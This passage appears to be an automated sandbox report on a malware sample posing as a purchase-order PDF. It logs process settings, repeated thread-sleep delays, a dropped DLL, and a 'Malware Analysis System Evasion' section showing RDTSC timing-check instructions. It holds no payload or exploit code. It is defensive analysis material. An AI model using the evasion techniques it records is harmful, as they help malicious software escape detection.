            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeAPI/Special instruction interceptor: Address: 542B18C
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeAPI/Special instruction interceptor: Address: 3F9B18C
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeRDTSC instruction interceptor: First address: 53EA910 second address: 53EA910 instructions: 0x00000000 rdtsc 0x00000002 cmp al, cl 0x00000004 cmp ebx, ecx 0x00000006 jc 00007FDAB0B68C44h 0x00000008 test ah, dh 0x0000000a cmp bl, dl 0x0000000c inc ebp 0x0000000d inc ebx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeRDTSC instruction interceptor: First address: 3F5A910 second address: 3F5A910 instructions: 0x00000000 rdtsc 0x00000002 cmp al, cl 0x00000004 cmp ebx, ecx 0x00000006 jc 00007FDAB0D34E94h 0x00000008 test ah, dh 0x0000000a cmp bl, dl 0x0000000c inc ebp 0x0000000d inc ebx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeMemory allocated: 110000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeMemory allocated: 35CD0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeMemory allocated: 37CD0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 599891Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 599781Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 599672Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 599563Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 599426Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 599297Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 599187Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 599078Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 598969Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 598844Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 598735Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 598610Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 598493Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 598375Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 598266Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 598141Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 598031Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 597922Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 597813Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 597688Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 597563Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 597437Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 597328Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 597219Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 597094Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 596985Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 596860Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 596735Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 596610Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 596485Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 596360Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 596235Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 596110Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 595985Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 595860Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 595735Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 595610Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 595485Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 595372Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 595250Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 595141Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 595016Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 594906Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 594797Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 594688Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 594563Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 594438Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 594328Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 594219Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeWindow / User API: threadDelayed 1500Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeWindow / User API: threadDelayed 8331Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsiEA09.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872Thread sleep count: 31 > 30Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872Thread sleep time: -28592453314249787s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872Thread sleep time: -599891s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7876Thread sleep count: 1500 > 30Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7876Thread sleep count: 8331 > 30Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872Thread sleep time: -599781s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872Thread sleep time: -599672s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872Thread sleep time: -599563s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872Thread sleep time: -599426s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872Thread sleep time: -599297s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872Thread sleep time: -599187s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872Thread sleep time: -599078s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872Thread sleep time: -598969s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872Thread sleep time: -598844s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872Thread sleep time: -598735s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872Thread sleep time: -598610s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872Thread sleep time: -598493s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872Thread sleep time: -598375s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872Thread sleep time: -598266s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872Thread sleep time: -598141s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872Thread sleep time: -598031s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872Thread sleep time: -597922s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872Thread sleep time: -597813s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872Thread sleep time: -597688s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872Thread sleep time: -597563s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872Thread sleep time: -597437s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872Thread sleep time: -597328s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872Thread sleep time: -597219s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872Thread sleep time: -597094s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872Thread sleep time: -596985s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872Thread sleep time: -596860s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872Thread sleep time: -596735s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872Thread sleep time: -596610s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872Thread sleep time: -596485s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872Thread sleep time: -596360s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872Thread sleep time: -596235s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872Thread sleep time: -596110s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872Thread sleep time: -595985s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872Thread sleep time: -595860s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872Thread sleep time: -595735s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872Thread sleep time: -595610s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872Thread sleep time: -595485s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872Thread sleep time: -595372s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872Thread sleep time: -595250s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872Thread sleep time: -595141s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872Thread sleep time: -595016s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872Thread sleep time: -594906s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872Thread sleep time: -594797s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872Thread sleep time: -594688s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872Thread sleep time: -594563s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872Thread sleep time: -594438s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872Thread sleep time: -594328s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872Thread sleep time: -594219s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeCode function: 0_2_00405846 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405846
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeCode function: 0_2_004027FB FindFirstFileW,0_2_004027FB
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeCode function: 0_2_00406398 FindFirstFileW,FindClose,0_2_00406398
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeCode function: 4_2_00405846 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,4_2_00405846
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeCode function: 4_2_004027FB FindFirstFileW,4_2_004027FB
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeCode function: 4_2_00406398 FindFirstFileW,FindClose,4_2_00406398
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 599891Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 599781Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 599672Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 599563Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 599426Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 599297Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 599187Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 599078Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 598969Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 598844Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 598735Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 598610Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 598493Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 598375Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 598266Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 598141Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 598031Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 597922Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 597813Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 597688Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 597563Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 597437Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 597328Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 597219Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 597094Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 596985Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 596860Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 596735Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 596610Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 596485Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 596360Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 596235Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 596110Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 595985Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 595860Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 595735Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 595610Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 595485Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 595372Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 595250Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 595141Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 595016Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 594906Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 594797Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 594688Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeThread delayed: delay time: 594563Jump to behavior
